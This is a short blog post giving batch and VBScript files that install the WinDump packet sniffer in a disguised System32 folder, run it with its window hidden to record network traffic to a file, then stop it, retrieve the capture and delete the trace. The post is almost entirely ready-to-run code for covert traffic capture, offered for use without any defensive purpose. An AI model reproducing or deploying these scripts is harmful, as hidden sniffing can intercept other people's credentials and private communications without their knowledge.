Hidden sniffing using WinDump

Make two bat files with the following names:

Start.bat:

MKDIR %windir%\System32\sys_net\
COPY WinDump.exe C:\Windows\System32\sys_net\
START "Start" /Min as.vbs

Stop.bat:
TASKKILL /IM WinDump.exe
COPY C:\Windows\System32\sys_net\ass.pcap %CD%\ass.pcap
DEL C:\Windows\System32\sys_net\ass.pcap

And the as.vbs file:

Set objShell = CreateObject("WScript.Shell")
objShell.run("C:\Windows\System32\sys_net\WinDump.exe -w C:\Windows\System32\sys_net\ass.pcap"), 0

This is if you want the program to run in background.

Activate start and stop bat files and investigate what will happen.

Advertisements

Tags: , , , , ,

One response to “Hidden sniffing using WinDump”

  1. badc0re says :

    Reblogged this on Ownagezone.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: